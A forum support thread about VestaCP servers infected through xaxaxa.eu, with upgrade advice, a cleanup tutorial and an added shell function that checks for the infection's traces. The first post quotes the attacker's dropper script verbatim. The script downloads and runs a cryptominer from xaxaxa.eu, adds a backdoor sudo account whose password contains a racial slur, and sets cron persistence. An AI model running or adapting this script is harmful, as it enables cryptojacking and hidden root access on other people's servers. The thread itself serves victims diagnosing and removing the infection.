have been HACKED ! by xaxaxa.eu
hello team,
just hacked by a dumb hacker who uses xaxaxa.eu/* and some sh script.
I am currently investigating if vesta was on release 22.
Some files have been altered; what do you need to know if your patch covers that attempt?
/tmp/load.sh:
```sh
if pgrep -x "gcc" > /dev/null
then
    echo "Running"
else
    cd;
    pkill -f xmrig;
    wget -O /tmp/gcc http://xaxaxa.eu/gcc;
    chmod +x gcc;
    wget -O /tmp/config_1.json http://xaxaxa.eu/config_1.json;
    /tmp/gcc -c /tmp/config_1.json;
    echo "fucktheniggers" | sudo -S useradd sysroot;
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
    (crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
    /usr/local/vesta/bin/v-update-sys-vesta-all;
fi
```
/tmp/config_1.json:
```json
{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "av": 0,
    "background": true,
    "colors": true,
    "cpu-priority": null,
    "donate-level": 0,
    "log-file": null,
    "max-cpu-usage": 100,
    "pools": [
        {
            "url": "pool1.xaxaxa.eu:28000",
            "user": "lol",
            "pass": "lol",
            "keepalive": true,
            "nicehash": false,
            "variant": -1
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "syslog": false,
    "threads": null
}
```
thank you,
Re: have been HACKED ! by xaxaxa.eu
Can you send more information about the creation time of the files? The Vesta dev team has patched this issue with release 22; for further investigation we need to be sure that the infection happened after the upgrade to 22.
Re: have been HACKED ! by xaxaxa.eu
I have the same problem.
Running:
```
apt-get update
```
and
```
apt-get install vesta
```
gives me:
```
vesta is already the newest version (0.9.8-20)
```
But that's not the latest version, is it?
Re: have been HACKED ! by xaxaxa.eu
I was hacked too by the same script.
To stop it quickly and dirty, I have mounted /tmp with the noexec parameter:
```
/dev/xvdc /tmp ext4 loop,noexec,nosuid,nodev,rw 0 0
```
And edited my /etc/hosts like this:
```
127.0.0.1 bigbatman.loan xaxaxa.eu
```
but the malware is still there...
The files /tmp/load.sh and /tmp/gcc were owned by the admin user, the same one vestacp uses...
Re: have been HACKED ! by xaxaxa.eu
As you can read in the red banner in the forum, the newest version is 0.9.8-22. Please do:
```
apt-get update && apt-get upgrade -y
cd /usr/local/vesta/bin
./v-update-sys-vesta-all
```
This should update your system, normally also vesta. Additionally, the last part starts the internal upgrade script from vestacp.
Then you can run this; when you get the same output, vesta is up to date:
```
# cd /usr/local/vesta/bin
# ./v-list-sys-vesta-updates
PKG         VER    REL  ARCH   UPDT  DATE
---         ---    ---  ----   ----  ----
vesta       0.9.8  22   amd64  yes   2018-06-25
vesta-php   0.9.8  21   amd64  yes   2018-05-17
vesta-nginx 0.9.8  21   amd64  yes   2018-05-17
```
Based on the information I have and see, it is normal that the vesta-php and vesta-nginx packages are on release 21.
Re: have been HACKED ! by xaxaxa.eu
> Spheerys wrote: ↑Tue Jun 26, 2018 6:50 am
> I was hacked too by the same script.
> To stop it quickly and dirty, I have mounted /tmp with the noexec parameter:
> /dev/xvdc /tmp ext4 loop,noexec,nosuid,nodev,rw 0 0
> And edited my /etc/hosts like this:
> 127.0.0.1 bigbatman.loan xaxaxa.eu
> but the malware is still there...
Based on this we try to answer the question "is the patch working": did you upgrade to the actual release?
Re: have been HACKED ! by xaxaxa.eu
I did the recommended upgrade but the malware is still present.
It inserts a file at /etc/cron/d/php5 with this content:
```
29 */3 * * * root [ -x /usr/lib/php5/sessionclean ] && /usr/lib/php5/sessionclean
```
And the /usr/lib/php5/sessionclean is:
```sh
#!/bin/sh -e
#
# sessionclean - a script to cleanup stale PHP sessions
#
# Copyright 2013-2015 Ondřej Surý <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
SAPIS="apache2:apache2 apache2filter:apache2 cgi:php5 fpm:php5-fpm cli:php5"
# Iterate through all web SAPIs
(
proc_names=""
for sapi in ${SAPIS}; do
    conf_dir=${sapi%%:*}
    proc_name=${sapi##*:}
    if [ -e /etc/php5/${conf_dir}/php.ini ]; then
        # Get all session variables once so we don't need to start PHP to get each config option
        session_config=$(PHP_INI_SCAN_DIR=/etc/php5/${conf_dir}/conf.d/ php5 -c /etc/php5/${conf_dir}/php.ini -d "error_reporting='~E_ALL'" -r 'foreach(ini_get_all("session") as $k => $v) echo "$k=".$v["local_value"]."\n";')
        save_handler=$(echo "$session_config" | sed -ne 's/^session\.save_handler=\(.*\)$/\1/p')
        save_path=$(echo "$session_config" | sed -ne 's/^session\.save_path=\(.*;\)\?\(.*\)$/\2/p')
        gc_maxlifetime=$(($(echo "$session_config" | sed -ne 's/^session\.gc_maxlifetime=\(.*\)$/\1/p')/60))
        if [ "$save_handler" = "files" -a -d "$save_path" ]; then
            proc_names="$proc_names $proc_name";
            printf "%s:%s\n" "$save_path" "$gc_maxlifetime"
        fi
    fi
done
# first find all open session files and touch them (hope it's not massive amount of files)
for pid in $(pidof $proc_names); do
    find "/proc/$pid/fd" -ignore_readdir_race -lname "$save_path/sess_\*" -exec touch -c {} \; 2>/dev/null
done
) | sort -rn -t: -k2,2 | sort -u -t: -k 1,1 | while IFS=: read -r save_path gc_maxlifetime; do
    # find all files older then maxlifetime and delete them
    find -O3 "$save_path/" -ignore_readdir_race -depth -mindepth 1 -name 'sess_*' -type f -cmin "+$gc_maxlifetime" -delete
done
exit 0
```
Re: have been HACKED ! by xaxaxa.eu
The upgrade does NOT remove the infection. If you are infected, you have to remove it manually. The upgrade "only" fixes the security issue that can cause an infection.
Re: have been HACKED ! by xaxaxa.eu
OK thanks.
I will document what I found to help others clean up...
Re: have been HACKED ! by xaxaxa.eu
Tutorial to stop the attack
It's not bulletproof and written quickly and dirty: just cleaning what I have found, and you may have to adapt it.
First, upgrade your system and VestaCP:
```
apt-get update && apt-get upgrade -y
cd /usr/local/vesta/bin
./v-update-sys-vesta-all
```
Look at this file or similar: /etc/cron/d/php5
If you are sure what you are doing, delete it.
Edit /usr/local/vesta/data/users/admin/cron.conf and remove the last lines about the malware.
Rebuild the vestacp cron of the admin user: v-rebuild-cron-jobs admin restart
Remove the latest lines of those files (which are talking about the sysroot account):
- /etc/passwd
- /etc/group
- /etc/gshadow
- /etc/subuid
- /etc/shadow
- /etc/sudoers (several lines !!!)
Useful tips:
- you can mount the /tmp partition with the noexec parameter to avoid script execution.
- you can edit your /etc/hosts file to avoid the connections to the remote malware scripts
- command to find the files modified during the last 600 minutes: find /usr/ -cmin -600
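The traces listed in the first post's load.sh and in the cleanup steps above, turned into a single check. This is an added example, not code from the thread or from the Vesta project; the sample tree it builds is constructed, and the crontab path /var/spool/cron/crontabs/admin is assumed for the admin user's crontab.

```sh
#!/bin/sh
# Added example (not from the thread or the Vesta project): a defender-side check
# for the indicators the posts describe. Pass a directory to scan an offline copy
# of a filesystem (or a constructed test tree); with no argument it scans /.
check_xaxaxa_iocs() {
    root="${1:-}"; found=0
    for f in passwd shadow group gshadow subuid; do   # account created by load.sh
        [ -f "$root/etc/$f" ] && grep -q '^sysroot:' "$root/etc/$f" &&
            { echo "account: sysroot present in /etc/$f"; found=1; }
    done
    [ -f "$root/etc/sudoers" ] && grep -q '^sysroot ALL=(ALL) ALL' "$root/etc/sudoers" &&
        { echo "sudoers: sysroot entry appended"; found=1; }
    for f in tmp/gcc tmp/load.sh tmp/config_1.json; do   # files dropped in /tmp
        [ -e "$root/$f" ] && { echo "file: /$f present"; found=1; }
    done
    # persistence: the @reboot crontab entry and the vesta copy of the admin cron (path assumed)
    for f in var/spool/cron/crontabs/admin usr/local/vesta/data/users/admin/cron.conf; do
        [ -f "$root/$f" ] && grep -q '/tmp/gcc' "$root/$f" &&
            { echo "cron: /tmp/gcc referenced in /$f"; found=1; }
    done
    if [ -z "$root" ]; then   # live system only: a running miner started from /tmp/gcc
        for exe in /proc/[0-9]*/exe; do
            [ "$(readlink "$exe" 2>/dev/null)" = "/tmp/gcc" ] &&
                { echo "process: ${exe%/exe} runs /tmp/gcc"; found=1; }
        done
    fi
    return $found
}

# Constructed sample tree (not a real system) with the traces an infected box shows.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/etc" "$d/tmp" "$d/var/spool/cron/crontabs"
    printf 'root:x:0:0:root:/root:/bin/sh\nsysroot:x:1001:1001::/home/sysroot:/bin/sh\n' > "$d/etc/passwd"
    printf 'root ALL=(ALL) ALL\nsysroot ALL=(ALL) ALL\n' > "$d/etc/sudoers"
    : > "$d/tmp/gcc"
    printf '@reboot /tmp/gcc -c /tmp/config_1.json\n' > "$d/var/spool/cron/crontabs/admin"
    echo "$d"
}

sample=$(make_sample_tree)
check_xaxaxa_iocs "$sample" || echo "indicators found under $sample; clean up as described above"
rm -rf "$sample"
```

The function exits non-zero when anything matches, so it can run from a cron job or a monitoring check; it reports only, deleting nothing.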